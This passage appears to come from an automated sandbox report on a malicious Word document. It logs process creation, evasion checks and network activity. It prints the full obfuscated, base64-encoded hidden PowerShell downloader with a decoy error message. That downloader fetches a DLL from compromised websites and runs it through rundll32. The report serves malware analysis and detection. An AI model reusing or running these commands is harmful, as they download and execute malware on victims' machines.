                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F109C FindFirstFileW,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnA